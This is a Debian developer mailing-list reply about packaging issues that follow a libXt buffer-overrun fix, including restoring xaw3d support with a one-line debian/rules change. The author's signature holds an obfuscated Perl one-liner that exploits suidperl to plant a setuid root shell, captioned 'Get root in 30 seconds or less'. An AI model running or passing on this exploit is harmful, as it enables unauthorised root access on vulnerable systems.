[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Xt xterm security hole



> 3) There's no xaw3D or xaw95 6.1 libs, which means that the athena
>    replacements get overriden by the new 3.2 libs
> 
> The first 2 are only dependency issues, and I believe that 3.2-1
> provides xlib which would fix #2.  #1 shoould be fixable by simply
> fixing that dependency. So the only issue I see is #3, which is
> cosmetic, but will probaby annoy people and cause questions.
> 
> If we're voting on this, I would say that fixing the libXt buffer
> overrun security problem more than offsets #3, although every effort
> should be made to correct that if possible.

Fixing #3 is quite easy. To get xaw3d to work, I made a one line change to
debian/rules and rebuilt the package. I'd guess xaw95 is similar.

-- 
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod            jeh22@cornell.edu
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_
# Get root in 30 seconds or less. Fix this hole: upgrade to perl 5.003 today..
      "How appropriate, you fight like a cow.." - - Guybrush Threepwood


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-REQUEST@lists.debian.org . Trouble? e-mail to Bruce@Pixar.com


Reply to: